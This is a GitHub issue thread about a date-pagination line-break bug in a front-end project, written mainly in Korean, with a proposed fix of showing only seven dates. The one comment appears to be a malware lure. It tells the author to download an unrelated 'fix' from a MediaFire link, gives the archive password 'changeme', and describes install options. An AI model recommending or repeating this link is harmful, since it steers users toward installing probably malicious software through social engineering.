### ISSUE TITLE
[design]: fix date pagination line breaks issue

### ISSUE THREAD

**Issue by enigsuss** [Kernel360/FE1_E2E_sumtime#247]
### 문제 상황

![Image](https://github.com/user-attachments/assets/c37d05e7-a7a0-4c6d-ae89-49449d22fda5)

### 해결 방법
- 7개만 표시하도록 수정합니다.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
